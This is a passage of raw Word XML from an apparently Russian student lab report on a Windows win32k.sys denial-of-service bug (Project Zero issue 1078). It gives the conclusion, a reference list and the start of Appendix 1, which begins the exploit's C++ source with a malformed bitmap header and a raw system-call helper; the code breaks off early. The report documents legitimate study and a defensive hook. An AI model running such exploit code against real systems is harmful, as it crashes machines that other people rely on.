    <w:p w14:paraId="6B4F860C" w14:textId="0CBBCA99" w:rsidR="00EB5249" w:rsidRPr="00EB5249" w:rsidRDefault="00EB5249" w:rsidP="00EB5249">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:t>Рисунок 10 — Аварийное завершение программы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA7250F" w14:textId="3013F72F" w:rsidR="00235DF6" w:rsidRPr="00173F59" w:rsidRDefault="00235DF6">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00173F59">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E76D318" w14:textId="3C2A10E9" w:rsidR="00085FB4" w:rsidRPr="0022399F" w:rsidRDefault="0071777F" w:rsidP="00E74C87">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="851"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Вывод</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445249BC" w14:textId="359A2A15" w:rsidR="00706A7F" w:rsidRDefault="00085FB4" w:rsidP="006F40AC">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>В ходе выполнения данной лабораторной работы был</w:t>
      </w:r>
      <w:r w:rsidR="007600BF">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">а </w:t>
      </w:r>
      <w:r w:rsidR="00706A7F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>исследована</w:t>
      </w:r>
      <w:r w:rsidR="007600BF">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> уязвимост</w:t>
      </w:r>
      <w:r w:rsidR="00706A7F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">ь компонента ОС </w:t>
      </w:r>
      <w:r w:rsidR="00706A7F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidR="007600BF">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00706A7F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Были изучены участки уязвимого кода и эксплойты, благодаря которым можно вызвать </w:t>
      </w:r>
      <w:r w:rsidR="00706A7F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DoS</w:t>
      </w:r>
      <w:r w:rsidR="00706A7F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> операционной системы. Были получены навыки работы с отладчиком </w:t>
      </w:r>
      <w:r w:rsidR="00706A7F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WinDBG</w:t>
      </w:r>
      <w:r w:rsidR="00706A7F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, утилитой </w:t>
      </w:r>
      <w:r w:rsidR="00706A7F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>BinDiff</w:t>
      </w:r>
      <w:r w:rsidR="00706A7F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. Был произведен сравнительный анализ уязвимого компонента и </w:t>
      </w:r>
      <w:r w:rsidR="00A53C23">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>пропатченного. В ходе анализа выяснилось, что были изменены многие компоненты драйвера в разной степени.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764D3B52" w14:textId="6EAE92FC" w:rsidR="002B295D" w:rsidRPr="005041F2" w:rsidRDefault="002B295D" w:rsidP="006F40AC">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Также было реализовано дополнительное задание. Требовалось разработать средство защиты от </w:t>
      </w:r>
      <w:r w:rsidR="005041F2">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">эксплойта. Для этого была использована техника </w:t>
      </w:r>
      <w:r w:rsidR="005041F2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hook</w:t>
      </w:r>
      <w:r w:rsidR="005041F2" w:rsidRPr="0093523E">
        <w:t>&amp;</w:t>
      </w:r>
      <w:r w:rsidR="005041F2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>inject</w:t>
      </w:r>
      <w:r w:rsidR="005041F2">
        <w:t xml:space="preserve">, с помощью которой блокировалось создание нового потока в процессе, вызывающего нарушение целостности памяти. В ходе реализации были встречены некоторые трудности. В частности, сначала подмена полезной нагрузки функции заключалась в </w:t>
      </w:r>
      <w:r w:rsidR="005041F2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidR="005041F2" w:rsidRPr="005041F2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005041F2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FALSE</w:t>
      </w:r>
      <w:r w:rsidR="005041F2" w:rsidRPr="005041F2">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="005041F2">
        <w:t xml:space="preserve"> что не помогло нарушить работу эксплойта, затем было решено вызывать</w:t>
      </w:r>
      <w:r w:rsidR="005041F2" w:rsidRPr="005041F2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005041F2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidR="005041F2" w:rsidRPr="005041F2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005041F2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
      <w:r w:rsidR="005041F2" w:rsidRPr="005041F2">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="005041F2">
        <w:t xml:space="preserve">однако и это не сработало. В конце концов было решено просто полностью завершить программу функцией </w:t>
      </w:r>
      <w:r w:rsidR="005041F2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>abort</w:t>
      </w:r>
      <w:r w:rsidR="005041F2">
        <w:t>(), а не пытаться блокировать создание нового потока.</w:t>
      </w:r>
      <w:r w:rsidR="00D558C7">
        <w:t xml:space="preserve"> Данное решение оказалось достаточным для поставленной задачи.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A01BF08" w14:textId="77777777" w:rsidR="00706A7F" w:rsidRDefault="00706A7F" w:rsidP="006F40AC">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="090ABF1C" w14:textId="4A39D26B" w:rsidR="00706A7F" w:rsidRDefault="00706A7F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB0077C" w14:textId="77777777" w:rsidR="0071777F" w:rsidRDefault="0071777F" w:rsidP="0071777F">
      <w:pPr>
        <w:pStyle w:val="afff1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Список использованных источников</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECB7A0A" w14:textId="77777777" w:rsidR="00767062" w:rsidRDefault="0071777F" w:rsidP="00767062">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0071777F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Issue 1078: Windows Kernel win32k.sys multiple bugs in the NtGdiGetDIBitsInternal system call. URL: </w:t>
      </w:r>
      <w:hyperlink r:id="rId22" w:history="1">
        <w:r w:rsidRPr="001678E7">
          <w:rPr>
            <w:rStyle w:val="aff3"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://bugs.chromium.org/p/project-zero/issues/detail?id=1078</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="263CB607" w14:textId="3DCC6F59" w:rsidR="00767062" w:rsidRPr="00767062" w:rsidRDefault="00767062" w:rsidP="00767062">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Список системных вызовов ОС </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00767062">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">URL: </w:t>
      </w:r>
      <w:hyperlink r:id="rId23" w:history="1">
        <w:r w:rsidRPr="001F1F38">
          <w:rPr>
            <w:rStyle w:val="aff3"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://github.com/j00ru/windows-syscalls/blob/master/x86/json/win32k-per-syscall.json</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="405D27EF" w14:textId="72C0858F" w:rsidR="00767062" w:rsidRDefault="00767062" w:rsidP="00767062">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00767062">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>How to Extract Original (Default) System Files from Windows Setup ISO / Disc</w:t>
      </w:r>
      <w:r w:rsidRPr="0071777F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. URL: </w:t>
      </w:r>
      <w:hyperlink r:id="rId24" w:history="1">
        <w:r w:rsidRPr="001F1F38">
          <w:rPr>
            <w:rStyle w:val="aff3"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://www.askvg.com/how-to-extract-copy-system-files-from-windows-xp-vista-7-or-windows-8-setup/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00767062">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B7675E" w14:textId="43F643DB" w:rsidR="00E41021" w:rsidRPr="0075529D" w:rsidRDefault="00767062" w:rsidP="00767062">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r w:rsidRPr="0075529D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00767062">
        <w:t xml:space="preserve">Введение в реверсинг с нуля, используя </w:t>
      </w:r>
      <w:r w:rsidRPr="00767062">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IDA</w:t>
      </w:r>
      <w:r w:rsidRPr="00767062">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00767062">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PRO</w:t>
      </w:r>
      <w:r w:rsidRPr="00767062">
        <w:t>. Часть 22.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="0075529D">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId25" w:history="1">
        <w:r w:rsidRPr="001F1F38">
          <w:rPr>
            <w:rStyle w:val="aff3"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https</w:t>
        </w:r>
        <w:r w:rsidRPr="0075529D">
          <w:rPr>
            <w:rStyle w:val="aff3"/>
          </w:rPr>
          <w:t>://</w:t>
        </w:r>
        <w:r w:rsidRPr="001F1F38">
          <w:rPr>
            <w:rStyle w:val="aff3"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>wasm</w:t>
        </w:r>
        <w:r w:rsidRPr="0075529D">
          <w:rPr>
            <w:rStyle w:val="aff3"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidRPr="001F1F38">
          <w:rPr>
            <w:rStyle w:val="aff3"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>in</w:t>
        </w:r>
        <w:r w:rsidRPr="0075529D">
          <w:rPr>
            <w:rStyle w:val="aff3"/>
          </w:rPr>
          <w:t>/</w:t>
        </w:r>
        <w:r w:rsidRPr="001F1F38">
          <w:rPr>
            <w:rStyle w:val="aff3"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>blogs</w:t>
        </w:r>
        <w:r w:rsidRPr="0075529D">
          <w:rPr>
            <w:rStyle w:val="aff3"/>
          </w:rPr>
          <w:t>/</w:t>
        </w:r>
        <w:r w:rsidRPr="001F1F38">
          <w:rPr>
            <w:rStyle w:val="aff3"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>vvedenie</w:t>
        </w:r>
        <w:r w:rsidRPr="0075529D">
          <w:rPr>
            <w:rStyle w:val="aff3"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidRPr="001F1F38">
          <w:rPr>
            <w:rStyle w:val="aff3"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>v</w:t>
        </w:r>
        <w:r w:rsidRPr="0075529D">
          <w:rPr>
            <w:rStyle w:val="aff3"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidRPr="001F1F38">
          <w:rPr>
            <w:rStyle w:val="aff3"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>reversing</w:t>
        </w:r>
        <w:r w:rsidRPr="0075529D">
          <w:rPr>
            <w:rStyle w:val="aff3"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidRPr="001F1F38">
          <w:rPr>
            <w:rStyle w:val="aff3"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>s</w:t>
        </w:r>
        <w:r w:rsidRPr="0075529D">
          <w:rPr>
            <w:rStyle w:val="aff3"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidRPr="001F1F38">
          <w:rPr>
            <w:rStyle w:val="aff3"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>nulja</w:t>
        </w:r>
        <w:r w:rsidRPr="0075529D">
          <w:rPr>
            <w:rStyle w:val="aff3"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidRPr="001F1F38">
          <w:rPr>
            <w:rStyle w:val="aff3"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ispolzuja</w:t>
        </w:r>
        <w:r w:rsidRPr="0075529D">
          <w:rPr>
            <w:rStyle w:val="aff3"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidRPr="001F1F38">
          <w:rPr>
            <w:rStyle w:val="aff3"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ida</w:t>
        </w:r>
        <w:r w:rsidRPr="0075529D">
          <w:rPr>
            <w:rStyle w:val="aff3"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidRPr="001F1F38">
          <w:rPr>
            <w:rStyle w:val="aff3"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>pro</w:t>
        </w:r>
        <w:r w:rsidRPr="0075529D">
          <w:rPr>
            <w:rStyle w:val="aff3"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidRPr="001F1F38">
          <w:rPr>
            <w:rStyle w:val="aff3"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>chast</w:t>
        </w:r>
        <w:r w:rsidRPr="0075529D">
          <w:rPr>
            <w:rStyle w:val="aff3"/>
          </w:rPr>
          <w:t>-22.586/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0075529D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E41021" w:rsidRPr="0075529D">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B96877" w14:textId="43835275" w:rsidR="00E41021" w:rsidRPr="006958D0" w:rsidRDefault="00E41021" w:rsidP="00E41021">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="851"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Приложение</w:t>
      </w:r>
      <w:r w:rsidRPr="006958D0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CEBCD4"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808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>#include</w:t>
      </w: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A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;Windows.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712EBECC"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95A8847"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FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>namespace</w:t>
      </w:r>
      <w:r w:rsidRPr="00783AE2">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> globals {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112AE27D"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2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>BITMAPCOREHEADER</w:t>
      </w:r>
      <w:r w:rsidRPr="00783AE2">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> header = { </w:t>
      </w:r>
      <w:r w:rsidRPr="00783AE2">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sizeof</w:t>
      </w:r>
      <w:r w:rsidRPr="00783AE2">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00783AE2">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>BITMAPCOREHEADER</w:t>
      </w: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8000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// bcSize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353F8EF5"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1,                        </w:t>
      </w:r>
      <w:r w:rsidRPr="00783AE2">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// bcWidth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625C13A9"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1,                        </w:t>
      </w:r>
      <w:r w:rsidRPr="00783AE2">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// bcHeight</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016B1F41"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1,                        </w:t>
      </w:r>
      <w:r w:rsidRPr="00783AE2">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// bcPlanes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059AA076"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1                         </w:t>
      </w:r>
      <w:r w:rsidRPr="00783AE2">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// bcBitCount</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180A89EA"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p>
    <w:p w14:paraId="67599A13"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2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>BYTE</w:t>
      </w:r>
      <w:r w:rsidRPr="00783AE2">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> padding[</w:t>
      </w:r>
      <w:r w:rsidRPr="00783AE2">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sizeof</w:t>
      </w:r>
      <w:r w:rsidRPr="00783AE2">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00783AE2">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>BITMAPINFOHEADER</w:t>
      </w:r>
      <w:r w:rsidRPr="00783AE2">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">) - </w:t>
      </w:r>
      <w:r w:rsidRPr="00783AE2">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sizeof</w:t>
      </w:r>
      <w:r w:rsidRPr="00783AE2">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00783AE2">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>BITMAPCOREHEADER</w:t>
      </w:r>
      <w:r w:rsidRPr="00783AE2">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7378B115"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8000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// namespace globals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782E7168"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8C18982"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8000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// For native 32-bit execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C51B44"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FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>extern</w:t>
      </w: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A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"C"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB3CDC7"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2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ULONG</w:t>
      </w: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6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CDECL</w:t>
      </w:r>
      <w:r w:rsidRPr="00783AE2">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> SystemCall32(</w:t>
      </w:r>
      <w:r w:rsidRPr="00783AE2">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DWORD</w:t>
      </w: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808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ApiNumber</w:t>
      </w:r>
      <w:r w:rsidRPr="00783AE2">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, ...) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BEA2F7A"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00FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
